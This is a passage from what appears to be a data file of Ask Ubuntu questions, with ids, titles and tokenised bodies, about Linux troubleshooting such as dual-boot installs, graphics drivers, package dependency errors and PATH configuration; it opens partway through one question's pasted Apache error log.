//localhost/php_selectquery/index.php [ mon jul 29 12:06:01 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:06:02 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:06:02 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:06:04 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ mon jul 29 12:06:04 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ mon jul 29 12:06:07 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ mon jul 29 12:06:07 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ mon jul 29 12:06:09 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ mon jul 29 12:06:09 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ mon jul 29 12:06:38 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:07:23 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:08:20 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:08:32 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:09:12 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:09:35 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:12:47 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/phpmyadmin , referer : http : //superuser.com/questions/114221/how-can-i-start-phpmyadmin/114258 [ mon jul 29 12:12:47 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:12:53 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/phpmyadmin [ mon jul 29 12:12:53 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:12:57 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/phpmyadmin [ mon jul 29 12:12:57 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:13:06 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/phpmyadmin [ mon jul 29 12:13:06 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:13:06 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:14:48 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:15:20 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:15:37 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:15:55 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:16:21 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:16:38 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:52:10 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 3 [ mon jul 29 12:52:22 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 3 [ mon jul 29 12:53:14 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 3 [ mon jul 29 12:54:01 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 3 failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ mon jul 29 15:13:17 2013 ] [ notice ] caught sigterm , shutting down failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ mon jul 29 15:13:18 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.7 with suhosin-patch configured -- resuming normal operations [ mon jul 29 15:13:48 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 15:13:48 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 15:13:48 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico
325938	playonlinux error while using internet explorer	while using internet explorer , the browser is getting stuck , and a playonlinux window is appearing with this message : [ pol_wine ] error : wine seems to have crashed . can anyone help me to fix this problem ?
325939	system tray missing in ubuntu 13.04 and notifications show only an icon	i just installed gnome 3 on ubuntu 13.04 . usually the system tray used to appear at the bottom when i moved my mouse there , but now nothing appears . also instead of the notification box appearing at the bottom just an icon appears , and then when the mouse is brought near it , it just vanishes . please help me out with this .
325944	how to change a directory using shell script ?	i am trying to change a directory to home/developer . i used cd home/developer in my shell script . after executing script it is again coming to original directory , where i executed shell script .
325946	unable to run bootable drive	it wo n't let me boot up ubuntu on the bootable drives . it just boots from my hdd everytime i select to run from the usb drive .
325948	ubuntu sucessfully installed , but comp only boots into windows 8	i have hp pavilion g6 notebook pc having windows 8 single language 64-bit and intel ( r ) core ( tm ) i3-3110m cpu @ 2.40ghz proccer . i want to install ubuntu 13.04. and i tried it 4-5 times to install . after all procedure it show me installation successful need to restart . after restarting it is loading with windows 8 in that time it shows repairing 'h'drive ( as i 'm installing it on my 'h ' drive . ) and no trace of ubuntu on on my laptop ... plz help ... . as ubuntu website posted that ubuntu installer is not support uefi/windows 8 ... shall i disable secure boot and then try or what plzzz help me .
325953	slow fx/unity perfomance in a intel ( r ) 915g/915gv/910gl graphics , can be improved ?	since i upgraded ubuntu to 13.04 , last friday , fx on unity is very slow . this is a pretty annoying issue , because everything has an fx : launcher menu , appl . switcher and so on . i tried to disable something using compiz , and now i can work , but i did n't solve everything , i still have the problem . my hardware configuration is : memory : 3.1 gib processor : intelâž pentium ( r ) 4 cpu 3.00ghz ă 2 graphics : vesa : intel ( r ) 915g/915gv/910gl graphics os type : 32-bit disk : 115.9 gb unity : 7.0.0 do you think it 's possible there 's a hardware misconfiguration ? the unity_support_test script reports me this : /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) opengl version string : 2.1 mesa 9.1.3 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no i tried to install 3rd part drivers , but there are no available drivers . someone has an idea ?
325955	how do i disable adobe flash `` hardware acceleration '' in terminal	i ca n't uncheck the box for settings to disable hardware acceleration in flash . can it be done in terminal or in firefox somehow ?
325957	the desktop would n't appear after my recent update to 13.04	i have a hp 8570w workstation with an nvidia graphics card . i did not update my system for a long time fearing that the graphics card would break and by mistake i updated the system recently . as expected it happen , my laptop gets stuck in blank screen when i power on . i am only able to login through tty1 to tty6 and on tty7 it just shows a blank screen and would n't proceed to the desktop . can someone help me fix this problem ? thank you
325959	unmet dependencies : install-build-dep.sh `` chromium prerequisites installation ''	i 'm trying to install the chromium prerequisites by running the install-build-dep.sh script . every time i try to run it i get this output : ***r @ ***r : ~/desktop $ sudo ./install-build-deps.sh -- no-chromeos-fonts this script installs all tools and libraries needed to build chromium . for most of the libraries , it can also install debugging symbols , which will allow you to debug code in the system libraries . most developers wo n't need these symbols . do you want me to install them for you ( y/n ) y installing debugging symbols . skipping installation of chrome os fonts . skipping installation of arm cross toolchain . hit http : //archive.canonical.com raring release.gpg hit http : //extras.ubuntu.com raring release.gpg hit http : //archive.canonical.com raring release hit http : //extras.ubuntu.com raring release hit http : //archive.ubuntu.com raring release.gpg hit http : //archive.canonical.com raring/partner amd64 packages hit http : //extras.ubuntu.com raring/main sources hit http : //archive.canonical.com raring/partner i386 packages hit http : //archive.ubuntu.com raring-updates release.gpg hit http : //extras.ubuntu.com raring/main amd64 packages hit http : //extras.ubuntu.com raring/main i386 packages hit http : //archive.ubuntu.com raring-security release.gpg hit http : //dl.google.com stable release.gpg hit http : //archive.ubuntu.com raring-proposed release.gpg hit http : //archive.ubuntu.com raring-backports release.gpg hit http : //archive.ubuntu.com raring release ign http : //archive.canonical.com raring/partner translation-en_us ign http : //archive.canonical.com raring/partner translation-en hit http : //archive.ubuntu.com raring-updates release hit http : //dl.google.com stable release.gpg hit http : //archive.ubuntu.com raring-security release ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en hit http : //archive.ubuntu.com raring-proposed release hit http : //archive.ubuntu.com raring-backports release hit http : //archive.ubuntu.com raring/main sources hit http : //archive.ubuntu.com raring/multiverse sources hit http : //archive.ubuntu.com raring/restricted sources hit http : //archive.ubuntu.com raring/universe sources hit http : //archive.ubuntu.com raring/main amd64 packages hit http : //archive.ubuntu.com raring/restricted amd64 packages hit http : //dl.google.com stable release hit http : //archive.ubuntu.com raring/universe amd64 packages hit http : //archive.ubuntu.com raring/multiverse amd64 packages hit http : //archive.ubuntu.com raring/main i386 packages hit http : //dl.google.com stable release hit http : //archive.ubuntu.com raring/restricted i386 packages hit http : //archive.ubuntu.com raring/universe i386 packages hit http : //archive.ubuntu.com raring/multiverse i386 packages hit http : //dl.google.com stable/main amd64 packages hit http : //archive.ubuntu.com raring/main translation-en hit http : //archive.ubuntu.com raring/multiverse translation-en hit http : //dl.google.com stable/main i386 packages hit http : //archive.ubuntu.com raring/restricted translation-en hit http : //archive.ubuntu.com raring/universe translation-en hit http : //archive.ubuntu.com raring-updates/main sources hit http : //archive.ubuntu.com raring-updates/multiverse sources hit http : //archive.ubuntu.com raring-updates/restricted sources hit http : //archive.ubuntu.com raring-updates/universe sources hit http : //archive.ubuntu.com raring-updates/main amd64 packages hit http : //archive.ubuntu.com raring-updates/restricted amd64 packages hit http : //archive.ubuntu.com raring-updates/universe amd64 packages hit http : //archive.ubuntu.com raring-updates/multiverse amd64 packages hit http : //archive.ubuntu.com raring-updates/main i386 packages hit http : //archive.ubuntu.com raring-updates/restricted i386 packages hit http : //archive.ubuntu.com raring-updates/universe i386 packages hit http : //archive.ubuntu.com raring-updates/multiverse i386 packages hit http : //archive.ubuntu.com raring-updates/main translation-en hit http : //archive.ubuntu.com raring-updates/multiverse translation-en hit http : //archive.ubuntu.com raring-updates/restricted translation-en hit http : //archive.ubuntu.com raring-updates/universe translation-en hit http : //archive.ubuntu.com raring-security/main sources hit http : //archive.ubuntu.com raring-security/multiverse sources hit http : //archive.ubuntu.com raring-security/restricted sources hit http : //archive.ubuntu.com raring-security/universe sources hit http : //archive.ubuntu.com raring-security/main amd64 packages hit http : //archive.ubuntu.com raring-security/restricted amd64 packages hit http : //archive.ubuntu.com raring-security/universe amd64 packages hit http : //archive.ubuntu.com raring-security/multiverse amd64 packages hit http : //archive.ubuntu.com raring-security/main i386 packages hit http : //archive.ubuntu.com raring-security/restricted i386 packages hit http : //archive.ubuntu.com raring-security/universe i386 packages hit http : //archive.ubuntu.com raring-security/multiverse i386 packages hit http : //archive.ubuntu.com raring-security/main translation-en hit http : //archive.ubuntu.com raring-security/multiverse translation-en hit http : //dl.google.com stable/main amd64 packages hit http : //archive.ubuntu.com raring-security/restricted translation-en hit http : //archive.ubuntu.com raring-security/universe translation-en hit http : //dl.google.com stable/main i386 packages hit http : //archive.ubuntu.com raring-proposed/restricted sources hit http : //archive.ubuntu.com raring-proposed/main sources hit http : //archive.ubuntu.com raring-proposed/multiverse sources hit http : //archive.ubuntu.com raring-proposed/universe sources hit http : //archive.ubuntu.com raring-proposed/restricted amd64 packages hit http : //archive.ubuntu.com raring-proposed/main amd64 packages hit http : //archive.ubuntu.com raring-proposed/multiverse amd64 packages hit http : //archive.ubuntu.com raring-proposed/universe amd64 packages hit http : //archive.ubuntu.com raring-proposed/restricted i386 packages hit http : //archive.ubuntu.com raring-proposed/main i386 packages hit http : //archive.ubuntu.com raring-proposed/multiverse i386 packages hit http : //archive.ubuntu.com raring-proposed/universe i386 packages hit http : //archive.ubuntu.com raring-proposed/main translation-en hit http : //archive.ubuntu.com raring-proposed/multiverse translation-en hit http : //archive.ubuntu.com raring-proposed/restricted translation-en hit http : //archive.ubuntu.com raring-proposed/universe translation-en hit http : //archive.ubuntu.com raring-backports/restricted sources hit http : //archive.ubuntu.com raring-backports/main sources hit http : //archive.ubuntu.com raring-backports/multiverse sources hit http : //archive.ubuntu.com raring-backports/universe sources hit http : //archive.ubuntu.com raring-backports/restricted amd64 packages hit http : //archive.ubuntu.com raring-backports/main amd64 packages hit http : //archive.ubuntu.com raring-backports/multiverse amd64 packages hit http : //archive.ubuntu.com raring-backports/universe amd64 packages hit http : //archive.ubuntu.com raring-backports/restricted i386 packages hit http : //archive.ubuntu.com raring-backports/main i386 packages hit http : //archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //archive.ubuntu.com raring-backports/universe i386 packages hit http : //archive.ubuntu.com raring-backports/main translation-en hit http : //archive.ubuntu.com raring-backports/multiverse translation-en hit http : //archive.ubuntu.com raring-backports/restricted translation-en hit http : //archive.ubuntu.com raring-backports/universe translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //archive.ubuntu.com raring/main translation-en_us ign http : //archive.ubuntu.com raring/multiverse translation-en_us ign http : //archive.ubuntu.com raring/restricted translation-en_us ign http : //archive.ubuntu.com raring/universe translation-en_us ign http : //archive.ubuntu.com raring-updates/main translation-en_us ign http : //archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //archive.ubuntu.com raring-updates/universe translation-en_us ign http : //archive.ubuntu.com raring-security/main translation-en_us ign http : //archive.ubuntu.com raring-security/multiverse translation-en_us ign http : //archive.ubuntu.com raring-security/restricted translation-en_us ign http : //archive.ubuntu.com raring-security/universe translation-en_us ign http : //archive.ubuntu.com raring-proposed/main translation-en_us ign http : //archive.ubuntu.com raring-proposed/multiverse translation-en_us ign http : //archive.ubuntu.com raring-proposed/restricted translation-en_us ign http : //archive.ubuntu.com raring-proposed/universe translation-en_us ign http : //archive.ubuntu.com raring-backports/main translation-en_us ign http : //archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //archive.ubuntu.com raring-backports/universe translation-en_us reading package lists ... done finding missing packages ... packages required : apache2.2-bin bison curl elfutils fakeroot flex g++ gperf language-pack-fr libapache2-mod-php5 libasound2-dev libbz2-dev libcairo2-dev libcups2-dev libcurl4-gnutls-dev libelf-dev libgconf2-dev libgl1-mesa-dev libglib2.0-dev libglu1-mesa-dev libgnome-keyring-dev libgtk2.0-dev libkrb5-dev libnspr4-dev libnss3-dev libpam0g-dev libpci-dev libpulse-dev libsctp-dev libspeechd-dev libsqlite3-dev libssl-dev libudev-dev libwww-perl libxslt1-dev libxss-dev libxt-dev libxtst-dev mesa-common-dev metacity patch perl php5-cgi pkg-config python python-cherrypy3 python-dev python-psutil rpm ruby subversion ttf-dejavu-core ttf-indic-fonts ttf-kochi-gothic ttf-kochi-mincho ttf-thai-tlwg wdiff git-core libbluetooth-dev libc6-i386 lib32gcc1 lib32stdc++6 ttf-mscorefonts-installer libjpeg-dev libudev1 libatk1.0-0 libc6 libasound2 libcairo2 libcups2 libexpat1 libfontconfig1 libfreetype6 libglib2.0-0 libgnome-keyring0 libgtk2.0-0 libpam0g libpango1.0-0 libpci3 libpcre3 libpixman-1-0 libpng12-0 libspeechd2 libstdc++6 libsqlite3-0 libx11-6 libxau6 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxi6 libxinerama1 libxrandr2 libxrender1 libxtst6 zlib1g libpulse0 libbz2-1.0 libcurl4-gnutls-dev libnspr4 libnss3 appmenu-gtk libatk1.0-dbg libc6-dbg libcairo2-dbg libfontconfig1-dbg libglib2.0-0-dbg libgtk2.0-0-dbg libpango1.0-0-dbg libpcre3-dbg libpixman-1-0-dbg libsqlite3-0-dbg libx11-6-dbg libxau6-dbg libxcb1-dbg libxcomposite1-dbg libxcursor1-dbg libxdamage1-dbg libxdmcp6-dbg libxext6-dbg libxfixes3-dbg libxi6-dbg libxinerama1-dbg libxrandr2-dbg libxrender1-dbg libxtst6-dbg zlib1g-dbg libnspr4-dbg libnss3-dbg e : unable to correct problems , you have held broken packages . the following command failed : sudo apt-get install -- reinstall apache2.2-bin bison curl elfutils fakeroot flex g++ gperf language-pack-fr libapache2-mod-php5 libasound2-dev libbz2-dev libcairo2-dev libcups2-dev libcurl4-gnutls-dev libelf-dev libgconf2-dev libgl1-mesa-dev libglib2.0-dev libglu1-mesa-dev libgnome-keyring-dev libgtk2.0-dev libkrb5-dev libnspr4-dev libnss3-dev libpam0g-dev libpci-dev libpulse-dev libsctp-dev libspeechd-dev libsqlite3-dev libssl-dev libudev-dev libwww-perl libxslt1-dev libxss-dev libxt-dev libxtst-dev mesa-common-dev metacity patch perl php5-cgi pkg-config python python-cherrypy3 python-dev python-psutil rpm ruby subversion ttf-dejavu-core ttf-indic-fonts ttf-kochi-gothic ttf-kochi-mincho ttf-thai-tlwg wdiff git-core libbluetooth-dev libc6-i386 lib32gcc1 lib32stdc++6 ttf-mscorefonts-installer libjpeg-dev libudev1 libatk1.0-0 libc6 libasound2 libcairo2 libcups2 libexpat1 libfontconfig1 libfreetype6 libglib2.0-0 libgnome-keyring0 libgtk2.0-0 libpam0g libpango1.0-0 libpci3 libpcre3 libpixman-1-0 libpng12-0 libspeechd2 libstdc++6 libsqlite3-0 libx11-6 libxau6 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxi6 libxinerama1 libxrandr2 libxrender1 libxtst6 zlib1g libpulse0 libbz2-1.0 libcurl4-gnutls-dev libnspr4 libnss3 appmenu-gtk libatk1.0-dbg libc6-dbg libcairo2-dbg libfontconfig1-dbg libglib2.0-0-dbg libgtk2.0-0-dbg libpango1.0-0-dbg libpcre3-dbg libpixman-1-0-dbg libsqlite3-0-dbg libx11-6-dbg libxau6-dbg libxcb1-dbg libxcomposite1-dbg libxcursor1-dbg libxdamage1-dbg libxdmcp6-dbg libxext6-dbg libxfixes3-dbg libxi6-dbg libxinerama1-dbg libxrandr2-dbg libxrender1-dbg libxtst6-dbg zlib1g-dbg libnspr4-dbg libnss3-dbg it produces the following output : reading package lists ... done building dependency tree reading state information ... done reinstallation of lib32gcc1 is not possible , it can not be downloaded . reinstallation of libstdc++6 is not possible , it can not be downloaded . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : g++ : depends : cpp ( > = 4:4.7.3-1ubuntu10 ) but it is not going to be installed depends : gcc ( > = 4:4.7.3-1ubuntu10 ) but it is not going to be installed depends : g++-4.7 ( > = 4.7.3-1~ ) but it is not going to be installed depends : gcc-4.7 ( > = 4.7.3-1~ ) but it is not going to be installed lib32stdc++6 : depends : gcc-4.7-base ( = 4.7.3-1ubuntu1 ) but 4.7.3-2ubuntu1~12.04 is to be installed e : unable to correct problems , you have held broken packages . you will have to install the above packages yourself .
325960	installing ubuntu 13.04 w/ win 7	i just got a new solid state hard drive ( samsung ssd 840 pro ) and am trying to install windows 7 and ubuntu 13.04 . i 'm coming across the known issue of ubuntu not recognizing the windows partition , and windows not being able to work with the ubuntu filesystem . here are some things that i 've tried and the associated problems : installing windows 7 first , and then trying to install ubuntu . i have exactly the same issue as this person ( ie , nautilus sees windows and i can mount , but gparted thinks the entire drive is unallocated ) . unfortunately the accepted solution basically only says `` use gdisk '' - if anyone could give step-by-step directions it would be much appreciated . installing ubuntu first , making sure to generate an ntfs partition for windows ( and of course a swap and boot partition ) . in this case windows does see all of the partitions , but claims that it ca n't install on the ntfs partition . i do n't remember the error off the top of my head ( and i currently have win7 installed , so no way to check ) but it was along the lines of the filesystem being wrong . the error was only one sentence and seemed fairly generic . let me know if any terminal output would be helpful . here 's the output of fdisk -l : ubuntu @ ubuntu : / $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x28554056 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 250066943 124930048 7 hpfs/ntfs/exfat disk /dev/sdb : 8100 mb , 8100249600 bytes 256 heads , 51 sectors/track , 1211 cylinders , total 15820800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 12144 15820799 7904328 c w95 fat32 ( lba ) any advice is appreciated !
325962	how to run multiple terminals on remote ubuntu server through ultravnc ?	i am trying to simultaneously run multiple instances of my application from terminal on remote ubuntu server . single terminal is required for running a single instance of application . i am accessing remote server through putty and ultravnc viewer . every time there is a network issue in my local machine ( which has windows 7 as os ) , application running through putty gets abruptly terminated with a message network error which is understandable . it wastes my time as i have to run application again and again from starting . by using ultra vnc viewer , application runs independently of network issue in my local setup . but i can run my application only through single terminal . when i try to execute multiple instances of vnc viewer , it shows same terminal . i want to work on multiple terminals via vnc viewer .
325964	terminal error : i2c i2c-0 sendbytes error -110	i am currently using a clean installation of ubuntu server 12.04 amd64 and i keep getting errors popping up saying : [ xxx.xxxx ] i2c i2c-0 : sendbytes : error -110 where x is the seconds the server has been online . the server appears to run fine apart from this . i could put up with it but it 's very intrusive in that it writes over the top of my command that i am typing or file that i am editing . it doesnt affect the data underneath but i can no longer see what i am typing . does anyone know what this is related to ? i 've searched online but come up with nothing except that it is possibly related to a kernal bug . other details that may be important : after running aptitude update and aptitude upgrade , error still persists 4gb of ram ran a memory checker for 12 hours , about 6 full checks and no errors roughly 30gb of space available for ubuntu on my ssd solid state also has windows 7 on it sda1 windows system reserved sda2 windows7 sda5 ubuntu server sda6 ubuntu swap edit : i 've noticed that i dont get the error messages through ssh , this leads me to believe that it is either in response to my usb keyboard or that ssh filters out these messages . while using ssh does solve the issue of these annnoying messages , it would still be nice to know the root cause of them .
325965	why i am unable to update ubuntu anymore using the update manager ?	why i am unable to update ubuntu anymore . i keep getting the following feedback : check your internet connection . failed to fetch http : //security.ubuntu.com/ubuntu/pool/multiverse/f/flashplugin-nonfree/flashplugin-installer_11.2.202.291ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/multiverse/f/flashplugin-nonfree/flashplugin-downloader_11.2.202.291ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] my internet connections are ok . so what is the problem ?
325967	rosegarden - change track volume level	i have ubuntu 12.10 and rosegarden 12.04 from repository . i have recorded some tracks from a midi keyboard with rosegarden . after that i wanted to decrease volume level to only one of my three tracks , so i changed the volume level of the desired track from `` instrument parameter '' section , and then i exported my project to .mid file . the problem is that when i reproduce the .mid exported file it plays every track with same volume level so he does not recognize my changes . what was wrong ? is that the correct way to change volume level to only one track ? thanks
325970	accessing windows & ubuntu shared external drive	tried 'gparted ' and 'disks ' in ubuntu but can not access data . i can see the drive however . i have tried 'computer manager ' in windows but can not access data . i need access to the drive , please help .
325971	black screen after booting after installed nvidia drivers	i am a new in ubuntu . so , the problem is , that i have installed nvidia-current drivers on ubuntu 13.04 on my macbook pro ( geforce 320m videocard ) , and after that , when i am trying to boot , there is a black screen . but the difficulty is , that tty is not working , so i ca n't remove this drivers . what should i do ? thank you in advance
325974	ubuntu 9.10 screen on virtualbox turns black ?	hi guys i have win7 and i wanted to move to ubuntu , i got a ubuntu 9.10 desktop edition dvd and installed it on virtualbox , but i had a problem with the screen display size . i followed the tutorial here : virtualbox/ubuntu 9.10 : changing screen resolution . i restarted ubuntu ; it starts good , but the desktop wo n't show up . it turns black and nothing happens . does anyone have an idea ?
325976	the difference between windows installer ( wubi ) and live cd/usb installing ?	again me . i am having trouble while installing ubuntu . as i remember , i downloaded ubuntu about two years ago and it was really easy . mainly because i used wubi and everything was fine . i installed it and restart the computer to choose what os will run my computer and it work fine ! for some reason after that , i had to uninstall ubuntu . now , i want to install it forever , but i wonder about what is the difference between wibu and livecd/usb download ? i read the instructions and i see that downloading by cd/usb is really hard , there are partitions , for example , which i even do n't know what they are ( english is not my native language : ( ) and it is really easy to download with wubi . i just want to know , which is the best way to install ubuntu ? thanks advance .
325990	how do i set up thuderbird for multiple email accounts in ubuntu	i have recently switched from windows to ubuntu ( so am a novice ! ! ! ) and want to use thunderbird for multiple email accounts . in windows , when i clicked the thunderbird icon , profile manager opened a window which allowed me to choose which profile ( email account ) i wanted to open . how do i set this up in ubuntu . i have tried the suggestions on various websites , but i ca n't seem to get the `` user profile chooser '' to display when i start thunderbird as the strings given do n't seem to work in the ubuntu terminal . thanks for any help .
325991	how can i install geforce 310m drivers raring ringtail ?	i 've got a problem . i 've installed raring ringtail , and have done all the updates . however , my hardware , geforce 310m , is not detected and does not appear in additional drivers ( software update ) . i have tried to install the driver manually , i got the source from here , thanks for that . but my ubuntu gave some errors , so i re-installed again . can somebody help me ? sorry for my bad english , also i 'm absolutely newbie ubuntu user . result of lspci | grep vga : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gt218m [ geforce 310m ] ( rev a2 )
325994	setting path with two different texlive versions	i have two different versions of texlive : the ubuntu binaries for texlive 2012 , which live in usr/share , and texlive 2013 which lives in usr/local . as per instructions here , my path now looks like the following : echo $ path /usr/local/texlive/2013/bin/x68_64-linux : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games the path is set in both my .bashrc and .profile files by path=/usr/local/texlive/2013/bin/x68_64-linux : $ path export $ path yet , whenever i run pdflatex or xelatex , it is taking the ubuntu texlive 2012 versions , while i need texlive 2013 . ( specifically , running xelatex my_example.tex results in some errors like latex error : file `unicode-math.sty ' not found . ) my texlive 2013 does exist : ls -l /usr/local/texlive/2013/bin/x68_64-linux returns the following . to use texlive 2013 , i need to manually run something like : /usr/loca/texlive/2013/bin/x68_64-linux/xelatex my_example.tex ( this does not return the unicode-math errors and generates the pdf nicely ) . also ( tlmgr is not in ubuntu distributions of texlive ) : tlgmr no command 'tlmgr ' found , did you mean : command 'rlmgr ' from package 'qdbm-util ' ( universe ) command 'vlmgr ' from package 'qdbm-util ' ( universe ) 